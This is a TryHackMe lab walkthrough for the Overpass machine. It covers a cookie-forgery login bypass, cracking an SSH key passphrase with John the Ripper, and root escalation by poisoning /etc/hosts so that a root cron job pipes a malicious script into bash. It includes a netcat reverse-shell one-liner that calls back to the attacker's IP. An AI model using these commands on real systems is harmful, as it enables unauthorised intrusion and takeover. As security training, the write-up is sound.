Overpass - TryHackMe Walkthrough

A beginner-friendly boot2root machine covering web enumeration, broken authentication via cookie manipulation, SSH key cracking, and privilege escalation by hijacking a cron job through /etc/hosts poisoning.

Room URL: https://tryhackme.com/room/overpass

Difficulty: Easy

Tools & Techniques Used

• Nmap
• Gobuster
• Browser Developer Tools (cookie manipulation)
• ssh2john + John the Ripper
• SSH
• linPEAS
• Cron job hijacking via /etc/hosts
• Python HTTP server
• Netcat (reverse shell listener)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

2. Web Enumeration

Browse to http://<TARGET_IP>/. The site hosts a password manager called "Overpass" with downloadable source code and an About Us page listing team members.

Use Gobuster to find hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key finding: /admin — A login page.

3. Broken Authentication (Cookie Bypass)

Inspecting the JavaScript file login.js reveals how the login works:

• It sends a POST to /api/login
• On success it sets a cookie called SessionToken
• The server only checks whether the cookie exists, not whether it's valid

Exploit this by setting the cookie manually in your browser's developer console:

document.cookie = "SessionToken=anything";

Reload /admin and you're logged in. The page reveals an SSH private key belonging to user james.

4. Crack the SSH Key

Save the key to a file and fix permissions:

chmod 600 james_id_rsa

The key is passphrase-protected. Crack it with John:

/usr/share/john/ssh2john.py james_id_rsa > james_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt james_rsa.hash

5. SSH Login and User Flag

Log in with the cracked passphrase:

ssh -i james_id_rsa james@<TARGET_IP>

Collect the user flag:

cat ~/user.txt

6. Privilege Escalation (Cron + /etc/hosts Hijack)

Local Enumeration

Read todo.txt in james's home directory — it mentions an automated build script and that james stores passwords in the overpass manager.

Check the crontab:

cat /etc/crontab

Key finding:

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

A cron job runs every minute as root, fetching and executing a script from overpass.thm.

Check /etc/hosts Permissions

ls -la /etc/hosts

The file is writable by the current user — this is the attack vector.

Set Up the Attack

On your machine, create the directory structure and a malicious build script:

mkdir -p downloads/src
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f' > downloads/src/buildscript.sh

Start a web server to serve the file:

sudo python3 -m http.server 80

Start a listener in another terminal:

nc -lvnp 4444

Poison /etc/hosts

On the target machine, edit /etc/hosts and change the overpass.thm entry to point to your IP:

nano /etc/hosts
# Change: 127.0.0.1 overpass.thm
# To:     <YOUR_IP> overpass.thm

Wait up to one minute for the cron job to fire. You should receive a root shell.

Root Flag

cat /root/root.txt

Notes

• Redact any real passwords/flags if publishing publicly.
• Key takeaways:
  • Broken authentication — always validate session tokens server-side, not just check for cookie existence
  • Writable /etc/hosts is a critical misconfiguration that enables DNS hijacking
  • Cron jobs running as root with external dependencies are a classic privilege escalation vector